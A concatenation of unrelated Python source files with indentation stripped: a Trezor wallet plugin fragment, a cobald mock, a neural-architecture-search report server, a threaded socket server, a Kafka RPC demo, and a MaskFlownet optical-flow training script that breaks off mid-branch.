x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
# btn diff
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = btn_addr_to_bitcoin_addr(address)
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
mock.py
|
import contextlib
import threading
import cobald.daemon
from cobald.daemon.runners.service import ServiceRunner
from cobald.interfaces import Pool, Controller
class MockController(Controller):
@property
def demand(self):
return self.target.demand
@demand.setter
def demand(self, value: float):
self.target.demand = value
@property
def supply(self):
return self.target.supply
@property
def utilisation(self):
return self.target.utilisation
@property
def allocation(self):
return self.target.allocation
class MockPool(Pool):
"""Pool allowing to set every attribute"""
demand, supply, allocation, utilisation = 0, 0, 0, 0
def __init__(self, demand=0, supply=0, allocation=0.5, utilisation=0.5):
self.demand = demand
self.supply = supply
self.allocation = allocation
self.utilisation = utilisation
@contextlib.contextmanager
def accept_services(payload: ServiceRunner = None, name=None):
"""Accept ``cobald`` services and temporarily replace ``cobald.daemon.runtime``"""
payload = payload if payload is not None else ServiceRunner(accept_delay=0.1)
thread = threading.Thread(
target=payload.accept, name=name or str(payload), daemon=True
)
thread.start()
if not payload.running.wait(1):
raise RuntimeError('%s failed to start' % payload)
prev_runner = cobald.daemon.runtime
cobald.daemon.runtime = payload
try:
yield
finally:
cobald.daemon.runtime = prev_runner
payload.shutdown()
thread.join()
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import traceback
import pickle
from copy import deepcopy
import numpy as np
import pandas as pd
import pareto
import time
from threading import Thread
from collections import OrderedDict
import zeus
from zeus.common import FileOps, TaskOps
from zeus.common.general import General
from zeus.report.share_memory import ShareMemory, ShareMemoryClient
from .nsga_iii import SortAndSelectPopulation
from .record import ReportRecord
class ReportServer(object):
"""Report class to save all records and broadcast records to share memory."""
_hist_records = OrderedDict()
__instances__ = None
__variables__ = set()
def __new__(cls, *args, **kwargs):
"""Override new method, singleton."""
if not cls.__instances__:
cls.__instances__ = super().__new__(cls, *args, **kwargs)
cls._thread_runing = True
cls._thread = cls._run_monitor_thread()
return cls.__instances__
def add(self, record):
"""Add one record into set."""
self._hist_records[record.uid] = record
@classmethod
def add_watched_var(cls, step_name, worker_id):
"""Add variable to ReportServer."""
cls.__variables__.add("{}.{}".format(step_name, worker_id))
@classmethod
def remove_watched_var(cls, step_name, worker_id):
"""Remove variable from ReportServer."""
key = "{}.{}".format(step_name, worker_id)
if key in cls.__variables__:
cls.__variables__.remove(key)
@classmethod
def stop(cls):
"""Stop report server."""
if hasattr(ReportServer, "_thread_runing") and ReportServer._thread_runing:
ReportServer._thread_runing = False
ReportServer._thread.join()
ShareMemoryClient().close()
@classmethod
def renew(cls):
"""Renew report server."""
if not hasattr(ReportServer, "_thread_runing") or not ReportServer._thread_runing:
ReportServer._thread_runing = True
ReportServer._thread = ReportServer._run_monitor_thread()
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance, desc=record.desc) for record in
records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
in_pareto = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
in_pareto = [item for item in in_pareto if None not in item]
if not in_pareto:
return None, None
try:
fitness = np.array(in_pareto)
if fitness.shape[1] != 1 and nums is not None and len(in_pareto) > nums:
# len must larger than nums, otherwise dead loop
_, res, selected = SortAndSelectPopulation(fitness.T, nums)
else:
outs = pareto.eps_sort(fitness, maximize_all=True, attribution=True)
res, selected = np.array(outs)[:, :-2], np.array(outs)[:, -1].astype(np.int32)
return res.tolist(), selected.tolist()
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return [], []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
if isinstance(records[0].rewards, list):
not_finished = [x.worker_id for x in records if None in x.rewards]
records = [x for x in records if None not in x.rewards]
else:
not_finished = [x.worker_id for x in records if x.rewards is None]
records = [x for x in records if x.rewards is not None]
if not_finished:
logging.warning("Workers not finished: {}".format(not_finished))
outs, selected = self.pareto_front(step_name, nums, records=records)
if not outs:
return []
if choice is not None:
selected = self._select_one_record(outs, choice)
return [records[idx] for idx in selected]
def _select_one_record(self, outs, choice='normal'):
"""Select one record."""
if choice == 'normal':
outs = np.array(outs).reshape(-1, 1).tolist()
prob = [round(np.log(i + 1e-2), 2) for i in range(1, len(outs[0]) + 1)]
prob_temp = prob
for idx, out in enumerate(outs):
sorted_ind = np.argsort(out)
for idx, ind in enumerate(sorted_ind):
prob[ind] += prob_temp[idx]
normalization = [float(i) / float(sum(prob)) for i in prob]
return [np.random.choice(len(outs[0]), p=normalization)]
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def dump(self):
"""Dump report to file."""
try:
_file = FileOps.join_path(TaskOps().step_path, "reports.json")
FileOps.make_base_dir(_file)
data = {}
for record in self.all_records:
if record.step_name in data:
data[record.step_name].append(record.to_dict())
else:
data[record.step_name] = [record.to_dict()]
with open(_file, "w") as f:
json.dump(data, f, indent=4)
_file = os.path.join(TaskOps().step_path, ".reports")
_dump_data = [ReportServer._hist_records, ReportServer.__instances__]
with open(_file, "wb") as f:
pickle.dump(_dump_data, f, protocol=pickle.HIGHEST_PROTOCOL)
self.backup_output_path()
except Exception:
logging.warning(traceback.format_exc())
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern = FileOps.join_path(model_folder, "desc_*.json")
files = glob.glob(pattern)
for _file in files:
try:
with open(_file) as f:
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if zeus.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif zeus.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
sample = dict(worker_id=worker_id, desc=json.load(f), weights_file=weights_file)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
@classmethod
def _run_monitor_thread(cls):
try:
logging.debug("Start report monitor thread.")
monitor_thread = Thread(target=ReportServer._monitor_thread, args=(cls.__instances__,))
monitor_thread.daemon = True
monitor_thread.start()
return monitor_thread
except Exception as e:
logging.error("Failed to run report monitor thread.")
raise e
@staticmethod
def _monitor_thread(report_server):
while report_server and report_server._thread_runing:
watched_vars = deepcopy(ReportServer.__variables__)
saved_records = report_server.all_records
for var in watched_vars:
step_name, worker_id = var.split(".")
if step_name != General.step_name:
continue
record_dict = None
try:
record_dict = ShareMemory(var).get()
except Exception:
logging.warning("Failed to get record, step name: {}, worker id: {}.".format(step_name, worker_id))
if record_dict:
record = ReportRecord().from_dict(record_dict)
saved_record = list(filter(
lambda x: x.step_name == step_name and str(x.worker_id) == str(worker_id), saved_records))
if not saved_record:
report_server.add(record)
ReportServer().dump()
else:
_ = record.code
if record.code != saved_record[0].code:
report_server.add(record)
ReportServer().dump()
ShareMemory(var).close()
time.sleep(0.2)
|
server.py
|
import socket
from threading import Thread
from client_handler import ClientHandler
class Server(object):
"""
The server class implements a server socket that can handle multiple client connections.
It is really important to handle any exceptions that may occur because other clients
are using the server too, and they may be unaware of the exceptions occurring. So, the
server must not be stopped when a exception occurs. A proper message needs to be show in the
server console.
"""
MAX_NUM_CONN = 10 # keeps 10 clients in queue
def __init__(self, host="localhost", port=12000):
self.host = host
self.port = port
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # your implementation for this socket here
self.handlers = {} # initializes client_handlers list
def _bind(self):
"""
:return: VOID
"""
self.server.bind((self.host, self.port))
def _listen(self):
"""
:return: VOID
"""
try:
self._bind()
self.server.listen(Server.MAX_NUM_CONN)
print("Server is running without issues")
print("Server listening at {}/{}".format(self.host, self.port))
except (ConnectionError, ConnectionAbortedError, ConnectionRefusedError, OSError) as err:
print(type(err), err)
def _accept_clients(self):
"""
:return: VOID
"""
while True:
clientsocket, addr = self.server.accept()
Thread(target=self._handler, args=(clientsocket, addr)).start() # start client thread
def _handler(self, clientsocket, addr):
"""
:clienthandler: the clienthandler child process that the server creates when a client is accepted
:addr: the addr list of server parameters created by the server when a client is accepted.
"""
clienthandler = ClientHandler(self, clientsocket, addr)
self.handlers[addr] = clienthandler # Set clientID as key, and socket object as value
clienthandler.run()
def run(self):
"""
Run the server.
:return: VOID
"""
self._listen()
self._accept_clients()
if __name__ == '__main__':
server = Server()
server.run()
|
kafka_rpc_server_multiple_topics_demo.py
|
# Copyright (c) 2017-2020, Carl Cheung
# All rights reserved.
"""
Two Basic Kafka RPC Server
"""
import time
from multiprocessing import Process
from kafka_rpc import KRPCServer
def start_server1():
# Part1: define a class
class Sum:
def add(self, x, y):
return x + y
# Part2: instantiate a class to an object
s = Sum()
# assuming you kafka broker is on 0.0.0.0:9092
krs = KRPCServer('localhost:9092', handle=s, topic_name='sum')
krs.server_forever()
def start_server2():
# Part1: define a class
class Diff:
def minus(self, x, y):
return x - y
# Part2: instantiate a class to an object
d = Diff()
# assuming you kafka broker is on 0.0.0.0:9092
krs = KRPCServer('localhost:9092', handle=d, topic_name='diff')
krs.server_forever()
p1 = Process(target=start_server1, daemon=True)
p1.start()
p2 = Process(target=start_server2, daemon=True)
p2.start()
while True:
time.sleep(1)
|
main.py
|
import os
import sys
import argparse
from timeit import default_timer
import yaml
import hashlib
import socket
# ======== PLEASE MODIFY ========
# where is the repo
repoRoot = r'.'
# to CUDA\vX.Y\bin
os.environ['PATH'] = r'path\to\your\NVIDIA GPU Computing Toolkit\CUDA\v9.0\bin' + ';' + os.environ['PATH']
# Flying Chairs Dataset
chairs_path = r'path\to\your\FlyingChairs_release\data'
chairs_split_file = r'path\to\your\FlyingChairs_release\FlyingChairs_train_val.txt'
import numpy as np
import mxnet as mx
# data readers
from reader.chairs import binary_reader, trainval, ppm, flo
from reader import sintel, kitti, hd1k, things3d
import cv2
model_parser = argparse.ArgumentParser(add_help=False)
training_parser = argparse.ArgumentParser(add_help=False)
training_parser.add_argument('--batch', type=int, default=8, help='minibatch size of samples per device')
parser = argparse.ArgumentParser(parents=[model_parser, training_parser])
parser.add_argument('config', type=str, nargs='?', default=None)
parser.add_argument('--dataset_cfg', type=str, default='chairs.yaml')
# proportion of data to be loaded
# for example, if shard = 4, then one fourth of data is loaded
# ONLY for things3d dataset (as it is very large)
parser.add_argument('-s', '--shard', type=int, default=1, help='')
parser.add_argument('-g', '--gpu_device', type=str, default='', help='Specify gpu device(s)')
parser.add_argument('-c', '--checkpoint', type=str, default=None,
help='model checkpoint to load; by default, the latest one.'
'You can use checkpoint:steps to load to a specific steps')
parser.add_argument('--clear_steps', action='store_true')
# the choice of network
parser.add_argument('-n', '--network', type=str, default='MaskFlownet')
# three modes
parser.add_argument('--debug', action='store_true', help='Do debug')
parser.add_argument('--valid', action='store_true', help='Do validation')
parser.add_argument('--predict', action='store_true', help='Do prediction')
# inference resize for validation and prediction
parser.add_argument('--resize', type=str, default='')
args = parser.parse_args()
ctx = [mx.cpu()] if args.gpu_device == '' else [mx.gpu(gpu_id) for gpu_id in map(int, args.gpu_device.split(','))]
infer_resize = [int(s) for s in args.resize.split(',')] if args.resize else None
import network.config
# load network configuration
with open(os.path.join(repoRoot, 'network', 'config', args.config)) as f:
config = network.config.Reader(yaml.load(f))
# load training configuration
with open(os.path.join(repoRoot, 'network', 'config', args.dataset_cfg)) as f:
dataset_cfg = network.config.Reader(yaml.load(f))
validation_steps = dataset_cfg.validation_steps.value
checkpoint_steps = dataset_cfg.checkpoint_steps.value
# create directories
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
mkdir('logs')
mkdir(os.path.join('logs', 'val'))
mkdir(os.path.join('logs', 'debug'))
mkdir('weights')
mkdir('flows')
# find checkpoint
import path
import logger
steps = 0
if args.checkpoint is not None:
if ':' in args.checkpoint:
prefix, steps = args.checkpoint.split(':')
else:
prefix = args.checkpoint
steps = None
log_file, run_id = path.find_log(prefix)
if steps is None:
checkpoint, steps = path.find_checkpoints(run_id)[-1]
else:
checkpoints = path.find_checkpoints(run_id)
try:
checkpoint, steps = next(filter(lambda t : t[1] == steps, checkpoints))
except StopIteration:
print('The steps not found in checkpoints', steps, checkpoints)
sys.stdout.flush()
raise StopIteration
steps = int(steps)
if args.clear_steps:
steps = 0
else:
_, exp_info = path.read_log(log_file)
exp_info = exp_info[-1]
for k in args.__dict__:
if k in exp_info and k in ('tag',):
setattr(args, k, eval(exp_info[k]))
print('{}={}, '.format(k, exp_info[k]), end='')
print()
sys.stdout.flush()
# generate id
if args.checkpoint is None or args.clear_steps:
uid = (socket.gethostname() + logger.FileLog._localtime().strftime('%b%d-%H%M') + args.gpu_device)
tag = hashlib.sha224(uid.encode()).hexdigest()[:3]
run_id = tag + logger.FileLog._localtime().strftime('%b%d-%H%M')
# initiate
from network import get_pipeline
pipe = get_pipeline(args.network, ctx=ctx, config=config)
lr_schedule = dataset_cfg.optimizer.learning_rate.get(None)
if lr_schedule is not None:
pipe.lr_schedule = lr_schedule
# load parameters from given checkpoint
if args.checkpoint is not None:
print('Load Checkpoint {}'.format(checkpoint))
sys.stdout.flush()
network_class = getattr(config.network, 'class').get()
# if train the head-stack network for the first time
if network_class == 'MaskFlownet' and args.clear_steps and dataset_cfg.dataset.value == 'chairs':
print('load the weight for the head network only')
pipe.load_head(checkpoint)
else:
print('load the weight for the network')
pipe.load(checkpoint)
if network_class == 'MaskFlownet':
print('fix the weight for the head network')
pipe.fix_head()
sys.stdout.flush()
if not args.valid and not args.predict and not args.clear_steps:
pipe.trainer.step(100, ignore_stale_grad=True)
pipe.trainer.load_states(checkpoint.replace('params', 'states'))
# ======== If to do prediction ========
if args.predict:
import predict
checkpoint_name = os.path.basename(checkpoint).replace('.params', '')
predict.predict(pipe, os.path.join(repoRoot, 'flows', checkpoint_name), batch_size=args.batch, resize = infer_resize)
sys.exit(0)
# ======== If to do validation ========
def validate():
validation_result = {}
for dataset_name in validation_datasets:
validation_result[dataset_name] = pipe.validate(*validation_datasets[dataset_name], batch_size = args.batch)
return validation_result
if args.valid:
log = logger.FileLog(os.path.join(repoRoot, 'logs', 'val', '{}.val.log'.format(run_id)), screen=True)
# sintel
sintel_dataset = sintel.list_data()
for div in ('training2', 'training'):
for k, dataset in sintel_dataset[div].items():
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
val_epe = pipe.validate(img1, img2, flow, mask, batch_size=args.batch, resize = infer_resize)
log.log('steps={}, sintel.{}.{}:epe={}'.format(steps, div, k, val_epe))
sys.stdout.flush()
# kitti
read_resize = (370, 1224) # if infer_resize is None else infer_resize
for kitti_version in ('2012', '2015'):
dataset = kitti.read_dataset(editions = kitti_version, parts = 'mixed', resize = read_resize)
val_epe = pipe.validate(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'], batch_size=args.batch, resize = infer_resize, return_type = 'epe')
log.log('steps={}, kitti.{}:epe={}'.format(steps, kitti_version, val_epe))
sys.stdout.flush()
val_epe = pipe.validate(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'], batch_size=args.batch, resize = infer_resize, return_type = 'kitti')
log.log('steps={}, kitti.{}:kitti={}'.format(steps, kitti_version, val_epe))
sys.stdout.flush()
log.close()
sys.exit(0)
# ======== If to do training ========
# load training/validation datasets
validation_datasets = {}
samples = 32 if args.debug else -1
t0 = default_timer()
if dataset_cfg.dataset.value == 'kitti':
batch_size = 4
print('loading kitti dataset ...')
sys.stdout.flush()
orig_shape = dataset_cfg.orig_shape.get([370, 1224])
resize_shape = (orig_shape[1], orig_shape[0])
parts = 'mixed' if dataset_cfg.train_all.get(False) else 'train'
# training
dataset = kitti.read_dataset(editions = 'mixed', parts = parts, samples = samples, resize = resize_shape)
trainSize = len(dataset['flow'])
training_datasets = [(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])] * batch_size
# validation
validationSize = 0
dataset = kitti.read_dataset(editions = '2012', parts = 'valid', samples = samples, resize = resize_shape)
validationSize += len(dataset['flow'])
validation_datasets['kitti.12'] = (dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])
dataset = kitti.read_dataset(editions = '2015', parts = 'valid', samples = samples, resize = resize_shape)
validationSize += len(dataset['flow'])
validation_datasets['kitti.15'] = (dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])
elif dataset_cfg.dataset.value == 'sintel':
batch_size = 4
print('loading sintel dataset ...')
sys.stdout.flush()
orig_shape = [436, 1024]
num_kitti = dataset_cfg.kitti.get(0)
num_hd1k = dataset_cfg.hd1k.get(0)
subsets = ('training' if dataset_cfg.train_all.get(False) else 'training1', 'training2')
# training
trainImg1 = []
trainImg2 = []
trainFlow = []
trainMask = []
sintel_dataset = sintel.list_data()
for k, dataset in sintel_dataset[subsets[0]].items():
dataset = dataset[:samples]
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
trainImg1.extend(img1)
trainImg2.extend(img2)
trainFlow.extend(flow)
trainMask.extend(mask)
trainSize = len(trainMask)
training_datasets = [(trainImg1, trainImg2, trainFlow, trainMask)] * (batch_size - num_kitti - num_hd1k)
resize_shape = (1024, dataset_cfg.resize_shape.get(436))
if num_kitti > 0:
print('loading kitti dataset ...')
sys.stdout.flush()
editions = '2015'
dataset = kitti.read_dataset(resize = resize_shape, samples = samples, editions = editions)
trainSize += len(dataset['flow'])
training_datasets += [(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])] * num_kitti
if num_hd1k > 0:
print('loading hd1k dataset ...')
sys.stdout.flush()
dataset = hd1k.read_dataset(resize = resize_shape, samples = samples)
trainSize += len(dataset['flow'])
training_datasets += [(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])] * num_hd1k
# validation
validationSize = 0
for k, dataset in sintel_dataset[subsets[1]].items():
dataset = dataset[:samples]
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
validationSize += len(flow)
validation_datasets['sintel.' + k] = (img1, img2, flow, mask)
elif dataset_cfg.dataset.value == 'things3d':
batch_size = 4
print('loading things3d dataset ...')
sub_type = dataset_cfg.sub_type.get('clean')
print('sub_type: ' + sub_type)
sys.stdout.flush()
orig_shape = [540, 960]
# %%%% WARNING %%%%
# the things3d dataset (subset) is very large
# therefore, the flow is converted to float16 by default
# in float16 format, the complete dataset is about 400 GB
# please set proper args.shard according to your device
# for example, if args.shard = 4, then one fourth of data is loaded
# training
things3d_dataset = things3d.list_data(sub_type = sub_type)
print(len(things3d_dataset['flow']))
print(len(things3d_dataset['flow'][:samples:args.shard]))
print(things3d_dataset['flow'][0])
from pympler.asizeof import asizeof
trainImg1 = [cv2.imread(file).astype('uint8') for file in things3d_dataset['image_0'][:samples:args.shard]]
print(asizeof(trainImg1[0]))
print(asizeof(trainImg1))
trainImg2 = [cv2.imread(file).astype('uint8') for file in things3d_dataset['image_1'][:samples:args.shard]]
print(asizeof(trainImg2[0]))
print(asizeof(trainImg2))
trainFlow = [things3d.load(file).astype('float16') for file in things3d_dataset['flow'][:samples:args.shard]]
print(asizeof(trainFlow[0]))
print(asizeof(trainFlow))
trainSize = len(trainFlow)
training_datasets = [(trainImg1, trainImg2, trainFlow)] * batch_size
print(asizeof(training_datasets))
# validation- chairs
_, validationSet = trainval.read(chairs_split_file)
validationSet = validationSet[:samples]
validationImg1 = [ppm.load(os.path.join(chairs_path, '%05d_img1.ppm' % i)) for i in validationSet]
validationImg2 = [ppm.load(os.path.join(chairs_path, '%05d_img2.ppm' % i)) for i in validationSet]
validationFlow = [flo.load(os.path.join(chairs_path, '%05d_flow.flo' % i)) for i in validationSet]
validationSize = len(validationFlow)
validation_datasets['chairs'] = (validationImg1, validationImg2, validationFlow)
'''
# validation- sintel
sintel_dataset = sintel.list_data()
divs = ('training',) if not getattr(config.network, 'class').get() == 'MaskFlownet' else ('training2',)
for div in divs:
for k, dataset in sintel_dataset[div].items():
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
validationSize += len(flow)
validation_datasets['sintel.' + k] = (img1, img2, flow, mask)
# validation- kitti
for kitti_version in ('2012', '2015'):
dataset = kitti.read_dataset(editions = kitti_version, crop = (370, 1224))
validationSize += len(dataset['flow'])
validation_datasets['kitti.' + kitti_version] = (dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])
'''
elif dataset_cfg.dataset.value == 'chairs':
batch_size = 8
print('loading chairs data ...')
sys.stdout.flush()
orig_shape = [384, 512]
trainSet, validationSet = trainval.read(chairs_split_file)
# training
trainSet = trainSet[:samples]
trainImg1 = [ppm.load(os.path.join(chairs_path, '%05d_img1.ppm' % i)) for i in trainSet]
trainImg2 = [ppm.load(os.path.join(chairs_path, '%05d_img2.ppm' % i)) for i in trainSet]
trainFlow = [flo.load(os.path.join(chairs_path, '%05d_flow.flo' % i)) for i in trainSet]
trainSize = len(trainFlow)
training_datasets = [(trainImg1, trainImg2, trainFlow)] * batch_size
# validaion- chairs
validationSet = validationSet[:samples]
validationImg1 = [ppm.load(os.path.join(chairs_path, '%05d_img1.ppm' % i)) for i in validationSet]
validationImg2 = [ppm.load(os.path.join(chairs_path, '%05d_img2.ppm' % i)) for i in validationSet]
validationFlow = [flo.load(os.path.join(chairs_path, '%05d_flow.flo' % i)) for i in validationSet]
validationSize = len(validationFlow)
validation_datasets['chairs'] = (validationImg1, validationImg2, validationFlow)
# validaion- sintel
sintel_dataset = sintel.list_data()
divs = ('training',) if not getattr(config.network, 'class').get() == 'MaskFlownet' else ('training2',)
for div in divs:
for k, dataset in sintel_dataset[div].items():
dataset = dataset[:samples]
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
validationSize += len(flow)
validation_datasets['sintel.' + k] = (img1, img2, flow, mask)
else:
